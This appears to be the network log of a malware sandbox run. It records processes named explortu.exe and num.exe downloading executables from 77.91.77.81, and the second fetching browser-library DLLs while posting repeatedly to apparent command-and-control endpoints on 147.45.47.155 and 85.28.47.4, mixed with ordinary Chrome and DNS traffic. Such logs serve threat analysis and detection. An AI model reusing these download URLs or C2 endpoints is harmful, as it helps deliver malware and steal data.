POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://147.45.47.155/ku4Nor9/index.php

explortu.exe

Remote address:

147.45.47.155:80

Request

POST /ku4Nor9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 147.45.47.155
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/cost/sarra.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /cost/sarra.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:14 GMT
Content-Type: application/octet-stream
Content-Length: 2441728
Last-Modified: Tue, 25 Jun 2024 08:35:43 GMT
Connection: keep-alive
ETag: "667a815f-254200"
Accept-Ranges: bytes
GET

http://77.91.77.81/cost/random.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /cost/random.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:17 GMT
Content-Type: application/octet-stream
Content-Length: 2476544
Last-Modified: Tue, 25 Jun 2024 08:35:06 GMT
Connection: keep-alive
ETag: "667a813a-25ca00"
Accept-Ranges: bytes
GET

http://77.91.77.81/well/random.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /well/random.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:21 GMT
Content-Type: application/octet-stream
Content-Length: 2426880
Last-Modified: Tue, 25 Jun 2024 08:37:09 GMT
Connection: keep-alive
ETag: "667a81b5-250800"
Accept-Ranges: bytes
GET

http://77.91.77.81/cost/num.exe

explortu.exe

Remote address:

77.91.77.81:80

Request

GET /cost/num.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 25 Jun 2024 08:50:25 GMT
Content-Type: application/octet-stream
Content-Length: 2515968
Last-Modified: Mon, 24 Jun 2024 23:38:39 GMT
Connection: keep-alive
ETag: "667a037f-266400"
Accept-Ranges: bytes
DNS

81.77.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.77.91.77.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

www.googleapis.com

Remote address:

8.8.8.8:53

Request

www.googleapis.com

IN A

Response

www.googleapis.com

IN A

142.250.187.234

www.googleapis.com

IN A

142.250.187.202

www.googleapis.com

IN A

142.250.200.42

www.googleapis.com

IN A

172.217.169.74

www.googleapis.com

IN A

142.250.179.234

www.googleapis.com

IN A

172.217.16.234

www.googleapis.com

IN A

172.217.169.42

www.googleapis.com

IN A

142.250.178.10

www.googleapis.com

IN A

216.58.204.74

www.googleapis.com

IN A

216.58.201.106

www.googleapis.com

IN A

142.250.180.10

www.googleapis.com

IN A

216.58.212.234

www.googleapis.com

IN A

172.217.169.10

www.googleapis.com

IN A

142.250.200.10
DNS

234.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.187.250.142.in-addr.arpa

IN PTR

Response

234.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f101e100net
DNS

consent.youtube.com

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

216.58.212.206
DNS

fonts.gstatic.com

Remote address:

8.8.8.8:53

Request

fonts.gstatic.com

IN A

Response

fonts.gstatic.com

IN A

216.58.201.99
DNS

195.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.212.58.216.in-addr.arpa

IN PTR

Response

195.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f31e100net

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f195�H

195.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f3�H
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

play.google.com

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.169.46
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.236.22
DNS

155.47.45.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.47.45.147.in-addr.arpa

IN PTR

Response
DNS

www.youtube.com

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.179.238
DNS

78.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.204.58.216.in-addr.arpa

IN PTR

Response

78.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f781e100net

78.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f14�H

78.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f14�H
DNS

www.gstatic.com

Remote address:

8.8.8.8:53

Request

www.gstatic.com

IN A

Response

www.gstatic.com

IN A

216.58.212.195
DNS

www.google.com

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

74.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f741e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f10�H

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f10�H
DNS

clients2.google.com

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

46.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

46.169.217.172.in-addr.arpa

IN PTR

Response

46.169.217.172.in-addr.arpa

IN PTR

lhr48s08-in-f141e100net
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
GET

https://www.youtube.com/account

chrome.exe

Remote address:

216.58.204.78:443

Request

GET /account HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
x-client-data: CLnrygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

chrome.exe

Remote address:

216.58.212.206:443

Request

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
x-client-data: CLnrygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: SOCS=CAAaBgiAkeizBg
cookie: YSC=jWjamKsx8YQ
cookie: __Secure-YEC=CgtMQVNkdnVCalRhWSjSieqzBjIKCgJHQhIEGgAgZg%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgZg%3D%3D
POST

https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j

chrome.exe

Remote address:

216.58.212.206:443

Request

POST /_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j HTTP/2.0
host: consent.youtube.com
content-length: 117
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
x-same-domain: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
sec-ch-ua-arch: "x86"
content-type: application/x-www-form-urlencoded;charset=UTF-8
sec-ch-ua-full-version: "110.0.5481.104"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
sec-ch-ua-bitness: "64"
sec-ch-ua-model:
sec-ch-ua-wow64: ?0
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://consent.youtube.com
x-client-data: CLnrygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://consent.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: SOCS=CAAaBgiAkeizBg
cookie: YSC=jWjamKsx8YQ
cookie: __Secure-YEC=CgtMQVNkdnVCalRhWSjSieqzBjIKCgJHQhIEGgAgZg%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgZg%3D%3D
cookie: OTZ=7616690_56_56__56_
DNS

99.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.201.58.216.in-addr.arpa

IN PTR

Response

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f991e100net

99.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f3�H

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f3�H
DNS

4.47.28.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.47.28.85.in-addr.arpa

IN PTR

Response
DNS

beacons.gcp.gvt2.com

Remote address:

8.8.8.8:53

Request

beacons.gcp.gvt2.com

IN A

Response

beacons.gcp.gvt2.com

IN CNAME

beacons-handoff.gcp.gvt2.com

beacons-handoff.gcp.gvt2.com

IN A

172.217.169.67
DNS

self.events.data.microsoft.com

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdwus05.westus.cloudapp.azure.com

onedscolprdwus05.westus.cloudapp.azure.com

IN A

20.189.173.6
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJ
Host: 85.28.47.4
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 156
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF
Host: 85.28.47.4
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF
Host: 85.28.47.4
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5416
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC
Host: 85.28.47.4
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
Host: 85.28.47.4
Content-Length: 4815
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://85.28.47.4/69934896f997d5bb/sqlite3.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/sqlite3.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
Host: 85.28.47.4
Content-Length: 675
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF
Host: 85.28.47.4
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
Host: 85.28.47.4
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://85.28.47.4/69934896f997d5bb/freebl3.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/freebl3.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://85.28.47.4/69934896f997d5bb/mozglue.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/mozglue.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://85.28.47.4/69934896f997d5bb/msvcp140.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/msvcp140.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "6dde8-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://85.28.47.4/69934896f997d5bb/nss3.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/nss3.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "1f3950-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://85.28.47.4/69934896f997d5bb/softokn3.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/softokn3.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "3ef50-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://85.28.47.4/69934896f997d5bb/vcruntime140.dll

num.exe

Remote address:

85.28.47.4:80

Request

GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
Host: 85.28.47.4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "13bf0-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
Host: 85.28.47.4
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
Host: 85.28.47.4
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
Host: 85.28.47.4
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ
Host: 85.28.47.4
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://85.28.47.4/920475a59bac849d.php

num.exe

Remote address:

85.28.47.4:80

Request

POST /920475a59bac849d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
Host: 85.28.47.4
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 25 Jun 2024 08:50:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

https://beacons.gcp.gvt2.com/domainreliability/upload

chrome.exe

Remote address:

172.217.169.67:443

Request

POST /domainreliability/upload HTTP/2.0
host: beacons.gcp.gvt2.com
content-length: 568
content-type: application/json; charset=utf-8
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

147.45.47.155:80

http://147.45.47.155/ku4Nor9/index.php

http

explortu.exe

2.0kB
2.0kB
18
12

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200
77.91.77.81:80

http://77.91.77.81/cost/num.exe

http

explortu.exe

337.9kB
10.2MB
7280
7277

HTTP Request

GET http://77.91.77.81/cost/sarra.exe

HTTP Response

200

HTTP Request

GET http://77.91.77.81/cost/random.exe

HTTP Response

200

HTTP Request

GET http://77.91.77.81/well/random.exe

HTTP Response

200

HTTP Request

GET http://77.91.77.81/cost/num.exe

HTTP Response

200
216.58.204.78:443

https://www.youtube.com/account

tls, http2

chrome.exe

2.1kB
10.6kB
15
19

HTTP Request

GET https://www.youtube.com/account
216.58.204.78:443

www.youtube.com

tls, http2

chrome.exe

1.0kB
8.2kB
10
10
216.58.212.206:443

https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j

tls, http2

chrome.exe

4.2kB
62.9kB
45
61

HTTP Request

GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

HTTP Request

POST https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
142.250.187.196:443

www.google.com

tls

chrome.exe

953 B
4.6kB
8
9
85.28.47.4:80

http://85.28.47.4/920475a59bac849d.php

http

num.exe

196.4kB
5.4MB
3914
3901

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/freebl3.dll

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/mozglue.dll

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/nss3.dll

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/softokn3.dll

HTTP Response

200

HTTP Request

GET http://85.28.47.4/69934896f997d5bb/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200

HTTP Request

POST http://85.28.47.4/920475a59bac849d.php

HTTP Response

200
142.250.187.238:443

clients2.google.com

tls, http2

chrome.exe

1.1kB
8.2kB
11
11
172.217.169.46:443

play.google.com

tls, http2

chrome.exe

1.0kB
7.7kB
10
10
172.217.169.67:443

https://beacons.gcp.gvt2.com/domainreliability/upload

tls, http2

chrome.exe

2.3kB
6.9kB
15
16

HTTP Request

POST https://beacons.gcp.gvt2.com/domainreliability/upload

8.8.8.8:53

81.77.91.77.in-addr.arpa

dns

686 B
1.3kB
10
10

DNS Request

81.77.91.77.in-addr.arpa

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

www.googleapis.com

DNS Response

142.250.187.234

142.250.187.202

142.250.200.42

172.217.169.74

142.250.179.234

172.217.16.234

172.217.169.42

142.250.178.10

216.58.204.74

216.58.201.106

142.250.180.10

216.58.212.234

172.217.169.10

142.250.200.10

DNS Request

234.187.250.142.in-addr.arpa

DNS Request

consent.youtube.com

DNS Response

216.58.212.206

DNS Request

fonts.gstatic.com

DNS Response

216.58.201.99

DNS Request

195.212.58.216.in-addr.arpa

DNS Request

196.187.250.142.in-addr.arpa

DNS Request

play.google.com

DNS Response

172.217.169.46

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.236.22
8.8.8.8:53

155.47.45.147.in-addr.arpa

dns

608 B
1.3kB
9
9

DNS Request

155.47.45.147.in-addr.arpa

DNS Request

www.youtube.com

